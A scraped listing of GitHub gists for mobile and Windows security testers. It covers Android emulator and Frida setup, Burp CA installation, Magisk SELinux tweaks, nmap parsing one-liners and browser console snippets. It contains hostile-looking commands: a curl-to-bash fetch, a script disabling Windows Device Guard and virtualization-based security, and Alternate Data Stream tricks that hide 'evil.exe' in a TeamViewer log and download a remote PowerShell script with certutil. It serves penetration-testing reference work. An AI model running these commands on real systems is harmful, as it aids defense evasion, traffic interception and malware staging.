Source: https://www.linkedin.com/pulse/android-emulator-tips-security-testers-divya-mudgal/
emulator -list-avds
emulator -avd Pixel_3_XL_API_26 -writable-system
Abhineet Jayaraj interference-security
interference-security
/ writable-avd.md
Last active
March 18, 2025 03:19
How to make AVD system and file-system writable?
interference-security
/ frida-server-ios-all-interfaces.sh
Last active
July 3, 2022 16:53
Run iOS frida-server on all interfaces
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install curl using Cydia before using the next command | |
| # /bin/bash -c "$(curl -fsSL https://gist.githubusercontent.com/interference-security/68faea1f4a445a7814cc2518a7d1c416/raw/c715dbc30397762239b3bf2d76c60859a5c83625/frida-server-ios-all-interfaces.sh)" | |
| launchctl unload -w /Library/LaunchDaemons/re.frida.server.plist | |
| cat >/Library/LaunchDaemons/re.frida.server.plist <<EOL | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <dict> | |
| <key>Label</key> | |
| <string>re.frida.server</string> |
interference-security
/ run_frida_magisk.md
Last active
June 22, 2022 18:54
Run Frida and Magisk together
#Source: https://serializethoughts.wordpress.com/2018/07/23/frida-magisk-and-selinux/
avc: denied { sigchld } for scontext=u:r:zygote:s0 tcontext=u:r:magisk:s0 tclass=process permissive=0
magiskpolicy --live "allow zygote magisk process *"
magiskpolicy --live "allow system_server magisk process *"
magiskpolicy --live "allow radio magisk process *"
interference-security
/ Android-System-SSL-Cert-Install.md
Last active
February 23, 2020 05:00
Install BurpSuite SSL Certificate on Android System Level
Source: https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
mv cacert.pem <hash>.0
adb push <hash>.0 /sdcard/Download/
adb shell
su
mount -o rw,remount /system
mv /sdcard/Download/.0 /system/etc/security/cacerts/
interference-security
/ disable-device-guard-virtualization-based-security.txt
Created
July 8, 2019 15:38
Disable Device Guard and Virtualization Based Security
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #SCRIPT TO DISABLE DEVICE GUARD & VIRTUALIZATION BASED SECURITY | |
| #https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage | |
| mountvol X: /s | |
| copy %WINDIR%\System32\SecConfig.efi X:\EFI\Microsoft\Boot\SecConfig.efi /Y | |
| bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader | |
| bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\SecConfig.efi" | |
| bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215} | |
| bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions DISABLE-LSA-ISO,DISABLE-VBS | |
| bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} device partition=X: | |
| mountvol X: /d |
interference-security
/ Exe_ADS_Methods.txt
Created
May 29, 2019 09:53
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Add content to ADS | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
interference-security
/ burp-android-noughat.txt
Created
August 13, 2018 13:26
Proxy in Android N and above
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Source: https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/ | |
| openssl x509 -inform DER -in cacert.der -out cacert.pem | |
| mv cacert.pem `openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1`.0 | |
| adb root | |
| adb remount | |
| adb push <cert>.0 /sdcard/ | |
| mv /sdcard/<cert>.0 /system/etc/security/cacerts/ | |
| chmod 644 /system/etc/security/cacerts/<cert>.0 |
interference-security
/ simple-https-server.py
Created
August 10, 2018 07:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| import BaseHTTPServer, SimpleHTTPServer, logging | |
| import ssl | |
| import sys | |
| import cgi | |
| class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
| def do_GET(self): | |
| #logging.error(self.headers) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Nmap open ports: | |
| Linux: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort -u -n | tr "\n" "," | sed 's/,$//' | |
| Windows: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort2 -u -n | tr -s "\r\n" "," | sed "s/,$//" | |
| Powershell: Select-String -Path .\filename.nmap -Pattern ".*/tcp.*open.*" | Select-Object -ExpandProperty Line | %{$_.Split('/')[0]} | Sort-Object -Unique | %{$_.replace("`r","a")} | |
| #Linux ping check: | |
| for ip in `cat TARGETS.txt`; do data=`ping $ip -c 1 | grep -i "packet loss" | cut -d "," -f3`; echo "$ip,$data"; done | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AngularJS: angular.version | |
| ReactJS: React.version | |
| JQuery: $().jquery; | |
| Remove disabled attribute: | |
| html_elements = ["input", "select", "button"]; for(j=0; j<html_elements.length; j++) { for(i=0; i<document.getElementsByTagName(html_elements[j]).length; i++) { document.getElementsByTagName(html_elements[j])[i].disabled=false; } } |